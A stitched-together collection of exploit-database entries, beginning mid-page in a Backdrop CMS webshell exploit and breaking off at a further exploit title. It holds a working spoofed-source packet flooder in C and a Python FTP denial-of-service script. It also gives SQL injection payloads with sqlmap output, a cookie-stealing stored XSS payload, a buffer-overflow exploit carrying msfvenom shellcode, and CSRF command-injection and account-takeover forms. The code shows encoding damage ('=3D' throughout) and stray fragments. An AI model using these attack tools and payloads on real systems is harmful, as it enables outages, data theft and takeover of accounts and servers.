<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1">
<input type="submit" value="Send">
</form>
</body>
</html>
Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands.
//Exploited By Hosein Askari
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#ifdef F_PASS
#include <sys/stat.h>
#endif
#include <netinet/in_systm.h>
#include <sys/socket.h>
#include <string.h>
#include <time.h>
#ifndef __USE_BSD
# define __USE_BSD
#endif
#ifndef __FAVOR_BSD
# define __FAVOR_BSD
#endif
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#ifdef LINUX
# define FIX(x) htons(x)
#else
# define FIX(x) (x)
#endif
#define TCP_ACK 1
#define TCP_FIN 2
#define TCP_SYN 4
#define TCP_RST 8
#define UDP_CFF 16
#define ICMP_ECHO_G 32
#define TCP_NOF 64
#define TCP_URG 128
#define TH_NOF 0x0
#define TCP_ATTACK() (a_flags & TCP_ACK ||\
a_flags & TCP_FIN ||\
a_flags & TCP_SYN ||\
a_flags & TCP_RST ||\
a_flags & TCP_NOF ||\
a_flags & TCP_URG )
#define UDP_ATTACK() (a_flags & UDP_CFF)
#define ICMP_ATTACK() (a_flags & ICMP_ECHO_G)
#define CHOOSE_DST_PORT() dst_sp =3D=3D 0 ?\
random () :\
htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
#define CHOOSE_SRC_PORT() src_sp =3D=3D 0 ?\
random () :\
htons(src_sp + (random() % (src_ep -src_sp +1)));
#define SEND_PACKET() if (sendto(rawsock,\
&packet,\
(sizeof packet),\
0,\
(struct sockaddr *)&target,\
sizeof target) < 0) {\
perror("sendto");\
exit(-1);\
}
#define BANNER_CKSUM 54018
u_long lookup(const char *host);
unsigned short in_cksum(unsigned short *addr, int len);
static void inject_iphdr(struct ip *ip, u_char p, u_char len);
char *class2ip(const char *class);
static void send_tcp(u_char th_flags);
static void send_udp(u_char garbage);
static void send_icmp(u_char garbage);
char *get_plain(const char *crypt_file, const char *xor_data_key);
static void usage(const char *argv0);
u_long dstaddr;
u_short dst_sp, dst_ep, src_sp, src_ep;
char *src_class, *dst_class;
int a_flags, rawsock;
struct sockaddr_in target;
const char *banner =3D "Written By C0NSTANTINE";
struct pseudo_hdr {
u_long saddr, daddr;
u_char mbz, ptcl;
u_short tcpl;
};
struct cksum {
struct pseudo_hdr pseudo;
struct tcphdr tcp;
};
struct {
int gv;
int kv;
void (*f)(u_char);
} a_list[] =3D {
{ TCP_ACK, TH_ACK, send_tcp },
{ TCP_FIN, TH_FIN, send_tcp },
{ TCP_SYN, TH_SYN, send_tcp },
{ TCP_RST, TH_RST, send_tcp },
{ TCP_NOF, TH_NOF, send_tcp },
{ TCP_URG, TH_URG, send_tcp },
{ UDP_CFF, 0, send_udp },
{ ICMP_ECHO_G, ICMP_ECHO, send_icmp },
{ 0, 0, (void *)NULL },
};
int
main(int argc, char *argv[])
{
int n, i, on =3D 1;
int b_link;
#ifdef F_PASS
struct stat sb;
#endif
unsigned int until;
a_flags =3D dstaddr =3D i =3D 0;
dst_sp =3D dst_ep =3D src_sp =3D src_ep =3D 0;
until =3D b_link =3D -1;
src_class =3D dst_class =3D NULL;
while ( (n =3D getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) !=3D -1) {
char *p;
switch (n) {
case 'T':
switch (atoi(optarg)) {
case 0: a_flags |=3D TCP_ACK; break;
case 1: a_flags |=3D TCP_FIN; break;
case 2: a_flags |=3D TCP_RST; break;
case 3: a_flags |=3D TCP_SYN; break;
case 4: a_flags |=3D TCP_URG; break;
}
break;
case 'U':
a_flags |=3D UDP_CFF;
break;
case 'I':
a_flags |=3D ICMP_ECHO_G;
break;
case 'N':
a_flags |=3D TCP_NOF;
break;
case 's':
src_class =3D optarg;
break;
case 'h':
dstaddr =3D lookup(optarg);
break;
case 'd':
dst_class =3D optarg;
i =3D 1;
break;
case 'p':
if ( (p =3D (char *) strchr(optarg, ',')) =3D=3D NULL)
usage(argv[0]);
dst_sp =3D atoi(optarg);
dst_ep =3D atoi(p +1);
break;
case 'q':
if ( (p =3D (char *) strchr(optarg, ',')) =3D=3D NULL)
usage(argv[0]);
src_sp =3D atoi(optarg);
src_ep =3D atoi(p +1);
break;
case 'l':
b_link =3D atoi(optarg);
if (b_link <=3D 0 || b_link > 100)
usage(argv[0]);
break;
case 't':
until =3D time(0) +atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if ( (!dstaddr && !i) ||
(dstaddr && i) ||
(!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
(src_sp !=3D 0 && src_sp > src_ep) ||
(dst_sp !=3D 0 && dst_sp > dst_ep))
usage(argv[0]);
srandom(time(NULL) ^ getpid());
if ( (rawsock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
}
if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
(char *)&on, sizeof(on)) < 0) {
perror("setsockopt");
exit(-1);
}
target.sin_family =3D AF_INET;
for (n =3D 0; ; ) {
if (b_link !=3D -1 && random() % 100 +1 > b_link) {
if (random() % 200 +1 > 199)
usleep(1);
continue;
}
for (i =3D 0; a_list[i].f !=3D NULL; ++i) {
if (a_list[i].gv & a_flags)
a_list[i].f(a_list[i].kv);
}
if (n++ =3D=3D 100) {
if (until !=3D -1 && time(0) >=3D until) break;
n =3D 0;
}
}
exit(0);
}
u_long
lookup(const char *host)
{
struct hostent *hp;
if ( (hp =3D gethostbyname(host)) =3D=3D NULL) {
perror("gethostbyname");
exit(-1);
}
return *(u_long *)hp->h_addr;
}
#define RANDOM() (int) random() % 255 +1
char *
class2ip(const char *class)
{
static char ip[16];
int i, j;
for (i =3D 0, j =3D 0; class[i] !=3D '{TEXTO}'; ++i)
if (class[i] =3D=3D '.')
++j;
switch (j) {
case 0:
sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
break;
case 1:
sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
break;
case 2:
sprintf(ip, "%s.%d", class, RANDOM());
break;
default: strncpy(ip, class, 16);
break;
}
return ip;
}
unsigned short
in_cksum(unsigned short *addr, int len)
{
int nleft =3D len;
int sum =3D 0;
unsigned short *w =3D addr;
unsigned short answer =3D 0;
while (nleft > 1) {
sum +=3D *w++;
nleft -=3D 2;
}
if (nleft =3D=3D 1) {
*(unsigned char *) (&answer) =3D *(unsigned char *)w;
sum +=3D answer;
}
sum =3D (sum >> 16) + (sum & 0xffff);
sum +=3D (sum >> 16);
answer =3D ~sum;
return answer;
}
static void
inject_iphdr(struct ip *ip, u_char p, u_char len)
{
ip->ip_hl =3D 5;
ip->ip_v =3D 4;
ip->ip_p =3D p;
ip->ip_tos =3D 0x08; /* 0x08 */
ip->ip_id =3D random();
ip->ip_len =3D len;
ip->ip_off =3D 0;
ip->ip_ttl =3D 255;
ip->ip_dst.s_addr =3D dst_class !=3D NULL ?
inet_addr(class2ip(dst_class)) :
dstaddr;
ip->ip_src.s_addr =3D src_class !=3D NULL ?
inet_addr(class2ip(src_class)) :
random();
target.sin_addr.s_addr =3D ip->ip_dst.s_addr;
}
static void
send_tcp(u_char th_flags)
{
struct cksum cksum;
struct packet {
struct ip ip;
struct tcphdr tcp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
cksum.pseudo.daddr =3D dstaddr;
cksum.pseudo.mbz =3D 0;
cksum.pseudo.ptcl =3D IPPROTO_TCP;
cksum.pseudo.tcpl =3D htons(sizeof(struct tcphdr));
cksum.pseudo.saddr =3D packet.ip.ip_src.s_addr;
packet.tcp.th_flags =3D random();
packet.tcp.th_win =3D random();
packet.tcp.th_seq =3D random();
packet.tcp.th_ack =3D random();
packet.tcp.th_off =3D 5;
packet.tcp.th_urp =3D 0;
packet.tcp.th_sport =3D CHOOSE_SRC_PORT();
packet.tcp.th_dport =3D CHOOSE_DST_PORT();
cksum.tcp =3D packet.tcp;
packet.tcp.th_sum =3D in_cksum((void *)&cksum, sizeof(cksum));
SEND_PACKET();
}
static void
send_udp(u_char garbage)
{
struct packet {
struct ip ip;
struct udphdr udp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
packet.udp.uh_sport =3D CHOOSE_SRC_PORT();
packet.udp.uh_dport =3D CHOOSE_DST_PORT();
packet.udp.uh_ulen =3D htons(sizeof packet.udp);
packet.udp.uh_sum =3D 0;
SEND_PACKET();
}
static void
send_icmp(u_char gargabe)
{
struct packet {
struct ip ip;
struct icmp icmp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
packet.icmp.icmp_type =3D ICMP_ECHO;
packet.icmp.icmp_code =3D 0;
packet.icmp.icmp_cksum =3D htons( ~(ICMP_ECHO << 8));
for(int pp=3D0;pp<=3D1000;pp++)
{SEND_PACKET();
pp++;
}
}
static void
usage(const char *argv0)
{
printf("%s \n", banner);
printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\=
n");
printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m=
\n");
printf(" -N Bogus attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0=
m\n");
printf(" -T TCP attack \e[1;37m[\e[0m0:ACK, 1:FIN, 2:RST, 3:SYN, 4:URG\e[1;=
37m]\e[0m\n");
printf(" -h destination host/ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;3=
7m)\e[0m\n");
printf(" -d destination class \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[=
0m\n");
printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\=
n");
printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom=
\e[0m\e[1;37m)\e[0m\n");
printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m=
\e[1;37m)\e[0m\n");
printf(" -l pps limiter \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n=
");
printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n")=
;
printf("\e[1musage\e[0m: %s [-T0 -T1 -T2 -T3 -T4 -U -I -h -p -t]\n", argv0)=
;
exit(-1);
}
# # # # #
# Exploit Title: Babysitter Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/babysitter-website
# Demo: http://babysitter.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/taskers?skills=[SQL]
#
# 63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
#
# Etc..
# # # # #
# Exploit Title: Baby Names Search Engine v1.0 - 'a' SQL Injection
# Dork: N/A
# Date: 27.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: MediaGeni
# Vendor Homepage:
https://codecanyon.net/item/baby-names-search-engine/11864316
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands
from search section with 'a' parameter.
====================================================
# PoC : SQLi :
Parameter: a (GET)
Type: UNION query
Demo:
http://www.site.com/index.php?q=test&M=true&F=true&a=Turkish&type=3
Title: Generic UNION query (NULL) - 4 columns
Payload: q=test&M=true&F=true&a=Turkish' UNION ALL SELECT
NULL,CONCAT(CONCAT('qzjqq','syfofZIoCuhULUBWOuONCiDLDFbwXYyhSdAJvCBU'),'qbzxq'),NULL,NULL--
ZYcF&type=3
====================================================
#!/usr/bin/python
### Baby FTP 1.24 - Denial of Service by n30m1nd ###
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.pablosoftwaresolutions.com/
# Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
# Version: 1.24
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script and write the IP to attack.
# Why?
# ====
# The FTP Server can't handle more than ~1505 connections at the same time
# Exploit code
# ============
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,21)))
print "[+] Connection %d" % i
crash1 = "A"*500
sarr[i].send("USER anonymous\r\n" )
sarr[i].recv(4096)
sarr[i].send("PASS n30m1nd\r\n" )
sarr[i].recv(4096)
i+=1
except socket.error:
print "[*] Server crashed!!"
raw_input()
break
# Exploit Title: Baby Care System 1.0 - 'roleid' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-23
# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
# Affected Version: Version 1
# Tested on Kali Linux
Step 1. Log in to the application with admin credentials.
Step 2. Click on "MENUS" on the left side and then edit any "Page Role".
Step 3. On the edit page, the URL should be: http://localhost/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7
Step 4. Run sqlmap on the URL where the "roleid" parameter is given
sqlmap -u "
http://192.168.1.240/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7"
--banner
---
Parameter: roleid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=pagerole&action=edit&roleid=8' AND 3077=3077 AND
'IPDn'='IPDn
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 2834 FROM(SELECT
COUNT(*),CONCAT(0x7170767871,(SELECT
(ELT(2834=2834,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jnFT'='jnFT
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 4559 FROM
(SELECT(SLEEP(5)))jaEa) AND 'iBGT'='iBGT
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=pagerole&action=edit&roleid=-2488' UNION ALL SELECT
CONCAT(0x7170767871,0x7577594366596d7077424f5746685366434a5244775565756b7a41566d63546c5156564e6d67556e,0x71717a6271),NULL,NULL,NULL--
-
---
[05:32:00] [INFO] the back-end DBMS is MySQL
[05:32:00] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.3.24-MariaDB-2'
---
[08:18:34] [INFO] the back-end DBMS is MySQL
[08:18:34] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.24-MariaDB-2'
---
Step 5. Sqlmap should inject the web-app successfully which leads to information disclosure.
# Exploit Title: Baby Care System 1.0 - 'Post title' Stored XSS
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
# Version: 1
# Tested on Windows
Vulnerable Parameters: Edit Page tab
Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "Post" tab on the left-hand side.
2: Add the new post and then add the payload "<audio src/onerror=alert(document.cookie)>" in "Post title" parameter and click on save button. Post Saved successfully.
3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.
# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
# Date: 2020-04-13
# Exploit Author: Andy Bowden
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 10 x86
#Instructions:
# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode.
f = open("crash.txt", "wb")
padding1 = b"ERCDERCD"
padding1 += b"\x90" * 100
# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
# cmd=calc.exe exitfunc=thread -f python
payload = b""
payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
egghunter = b"\x8B\xFD" # mov edi,ebp
egghunter += b"\xB8\x45\x52\x43\x44" # mov eax,45525344 ERCD
egghunter += b"\x47" # inc edi
egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xFB" # jne
egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
egghunter += b"\x75\xF7" # jne
egghunter += b"\xFF\xE7" # jmp edi
buf = padding1 + payload
buf += b"\x90" * (580 - len(padding1 + payload))
buf += egghunter
buf += b"\x90" * (620 - len(buf))
buf += b"\x90\x90\xEB\xCE"
buf += b"\x86\x1e\x40" #00401e86
f.write(buf)
f.close()
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-B374K-CSRF-CMD-INJECTION.txt
Vendor:
============================================
github.com/b374k/b374k
code.google.com/p/b374k-shell/downloads/list
code.google.com/archive/p/b374k-shell/
Product:
==============================================
b374k versions 3.2.3 and 2.8
b374k is a PHP Webshell with many features such as:
File manager (view, edit, rename, delete, upload, download as archive,etc)
Command execution, Script execution (php, perl, python, ruby, java,
node.js, c)
Give you shell via bind/reverse shell connect
Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more
using ODBC or PDO)
Process list/Task manager.
This is useful for system/web admin to do remote management without opening
cpanel, connecting using ssh,
ftp etc. All actions take place within a web browser.
Note:
b374k is considered by some as a malicious backdoor and is flagged by some
AV upon download.
Vulnerability Type:
=============================
CSRF Remote Command Injection
Vulnerability Details:
=====================
No CSRF protection exists in b374k Web Shell allowing arbitrary OS command
injection, if currently
logged in user visits our malicious website or clicks our infected linxs.
vulnerable b374k code:
<?php
if(isset($_GP['cmd'])) <------ $_GP holds value of $_GET passed to the
shell.
<form action='<?php echo $s_self; ?>' method='post'>
<input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd'
style='width:70%;' value='<?php
if(isset($_GP['cmd'])) echo "";
else echo "- shell command -";
?>' />
<noscript><input class='inputzbut' type='submit' value='Go !'
name='submitcmd' style='width:80px;' /></noscript>
</form>
Exploit code(s):
=================
Run Windows calc.exe as POC...
[CSRF Command Injections]
v3.2
Adding password and packing to b374k single PHP file.
c:\xampp\htdocs\b374k-master>php -f index.php -- -o myshell.php -p abc123
-s -b -z gzcompress -c 9
b374k shell packer 0.4.2
Filename : myshell.php
Password : xxxxxx
Theme : default
Modules : convert,database,info,mail,network,processes
Strip : yes
Base64 : yes
Compression : gzcompress
Compression level : 9
Result : Succeeded : [ myshell.php ] Filesize : 111419
(CSRF Command injection 1)
<form id='ABYSMALGODS' action='
http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes'
method='post'>
<input id='cmd' type='text' name='terminalInput' value='calc.exe' />
<script>document.getElementById('ABYSMALGODS').submit()</script>
</form>
v2.8
(CSRF Command injection 2)
<form id='HELL' action='http://localhost/b374k-2.8.php?' method='post'>
<input id='cmd' type='text' name='cmd' value='calc.exe' />
<script>document.getElementById('HELL').submit()</script>
</form>
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Description:
==================================================
Request Method(s): [+] POST
Vulnerable Product: [+] b374k 3.2 and 2.8
Vulnerable Parameter(s): [+] terminalInput, cmd
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
# Exploit Author: Alperen Ergel (@alpernae)
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/7-2-2
# Version : 7.2.2
# Tested on: Kali Linux
# Category: WebApp
######## Description ########
Allows to attacker change admin account details.
######## Proof of Concept ########
===> REQUEST <====
POST /b2evolution/evoadm.php HTTP/1.1
Host: s2.demo.opensourcecms.com
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1031
Origin: https://s2.demo.opensourcecms.com
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
## < SNIPP >
edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1
#### Proof-Of-Concept ####
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
<input type="hidden" name="edited_user_login" value="CHANGEHERE" />
<input type="hidden" name="edited_user_firstname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_lastname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_nickname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_gender" value="M" />
<input type="hidden" name="edited_user_ctry_ID" value="233" />
<input type="hidden" name="edited_user_rgn_ID" value="" />
<input type="hidden" name="edited_user_subrg_ID" value="" />
<input type="hidden" name="edited_user_city_ID" value="" />
<input type="hidden" name="edited_user_age_min" value="" />
<input type="hidden" name="edited_user_age_max" value="" />
<input type="hidden" name="edited_user_birthday_month" value="" />
<input type="hidden" name="edited_user_birthday_day" value="" />
<input type="hidden" name="edited_user_birthday_year" value="" />
<input type="hidden" name="organizations[]" value="1" />
<input type="hidden" name="org_roles[]" value="King of Spades" />
<input type="hidden" name="org_priorities[]" value="" />
<input type="hidden" name="uf_1" value="I am the demo administrator of this site. I love having so much power!" />
<input type="hidden" name="uf_new[2][]" value="" />
<input type="hidden" name="uf_new[3][]" value="" />
<input type="hidden" name="uf_2" value="https://twitter.com/b2evolution/" />
<input type="hidden" name="uf_3" value="https://www.facebook.com/b2evolution" />
<input type="hidden" name="uf_4" value="https://plus.google.com/+b2evolution/posts" />
<input type="hidden" name="uf_5" value="https://www.linkedin.com/company/b2evolution-net" />
<input type="hidden" name="uf_6" value="https://github.com/b2evolution/b2evolution" />
<input type="hidden" name="uf_7" value="http://b2evolution.net/" />
<input type="hidden" name="new_field_type" value="0" />
<input type="hidden" name="actionArray[update]" value="Save Changes!" />
<input type="hidden" name="crumb_user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
<input type="hidden" name="ctrl" value="user" />
<input type="hidden" name="user_tab" value="profile" />
<input type="hidden" name="identity_form" value="1" />
<input type="hidden" name="user_ID" value="1" />
<input type="hidden" name="orig_user_ID" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection
# Author: @nu11secur1ty
